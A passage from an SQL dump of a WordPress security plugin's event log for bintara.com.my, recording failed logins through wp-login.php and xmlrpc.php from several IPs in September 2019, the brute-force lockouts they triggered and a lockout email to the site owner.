.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIR1iJ7D9Gn7wDPh8YKwAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065038.4657\";s:12:\"REQUEST_TIME\";s:10:\"1569065038\";}}','notice','2019-09-21 11:24:04','2019-09-21 11:24:02',17795048,19284520,'https://bintara.com.my/2019/wp-login.php',1,0,'138.197.146.132'),(25564,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIVXkXpgmG5P@iB8kVkgAAAII\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"194.244.33.34\";s:11:\"REMOTE_PORT\";s:5:\"32840\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIVXkXpgmG5P@iB8kVkgAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065050.3875\";s:12:\"REQUEST_TIME\";s:10:\"1569065050\";}}','notice','2019-09-21 11:24:15','2019-09-21 11:24:14',17797576,19288224,'https://bintara.com.my/wordpress/wp-login.php',1,0,'194.244.33.34'),(25565,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIWnkXpgmG5P@iB8kVlwAAAIA\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"138.197.146.132\";s:11:\"REMOTE_PORT\";s:5:\"55442\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIWnkXpgmG5P@iB8kVlwAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065057.9704\";s:12:\"REQUEST_TIME\";s:10:\"1569065057\";}}','notice','2019-09-21 11:24:22','2019-09-21 11:24:21',18313528,19612184,'https://bintara.com.my/2019/xmlrpc.php',1,0,'138.197.146.132'),(25566,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIYHkXpgmG5P@iB8kVmQAAAIM\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"194.244.33.34\";s:11:\"REMOTE_PORT\";s:5:\"35684\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIYHkXpgmG5P@iB8kVmQAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569065061.977\";s:12:\"REQUEST_TIME\";s:10:\"1569065061\";}}','notice','2019-09-21 11:24:27','2019-09-21 11:24:25',18313424,19610472,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'194.244.33.34'),(25567,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIb1iJ7D9Gn7wDPh8YQQAAAMg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"53130\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIb1iJ7D9Gn7wDPh8YQQAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065077.5086\";s:12:\"REQUEST_TIME\";s:10:\"1569065077\";}}','notice','2019-09-21 11:24:42','2019-09-21 11:24:41',17794872,19284648,'https://bintara.com.my/2019/wp-login.php',1,0,'93.114.86.226'),(25568,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:24:41\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:24:41\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:39:41\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:39:41\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:24:42','2019-09-21 11:24:41',17879584,19284648,'https://bintara.com.my/2019/wp-login.php',1,0,'93.114.86.226'),(25569,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:24:42','2019-09-21 11:24:41',18085336,19284648,'https://bintara.com.my/2019/wp-login.php',1,0,'93.114.86.226'),(25570,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIg3kXpgmG5P@iB8kVsAAAAIc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.146.230\";s:11:\"REMOTE_PORT\";s:5:\"38180\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIg3kXpgmG5P@iB8kVsAAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065097.1238\";s:12:\"REQUEST_TIME\";s:10:\"1569065097\";}}','notice','2019-09-21 11:25:00','2019-09-21 11:24:58',17892896,19382304,'https://bintara.com.my/blog/wp-login.php',1,0,'132.148.146.230'),(25571,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIjHkXpgmG5P@iB8kVuwAAAJY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:10:\"36.92.1.31\";s:11:\"REMOTE_PORT\";s:5:\"57642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIjHkXpgmG5P@iB8kVuwAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065102.0931\";s:12:\"REQUEST_TIME\";s:10:\"1569065102\";}}','notice','2019-09-21 11:25:07','2019-09-21 11:25:06',17798416,19289160,'https://bintara.com.my/wp/wp-login.php',1,0,'36.92.1.31'),(25572,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIi1iJ7D9Gn7wDPh8YRgAAAMM\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"58158\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIi1iJ7D9Gn7wDPh8YRgAAAMM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065102.1647\";s:12:\"REQUEST_TIME\";s:10:\"1569065102\";}}','notice','2019-09-21 11:25:07','2019-09-21 11:25:06',18315208,19610936,'https://bintara.com.my/2019/xmlrpc.php',1,0,'93.114.86.226'),(25573,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:25:06\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:25:06\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:40:06\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:40:06\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:25:07','2019-09-21 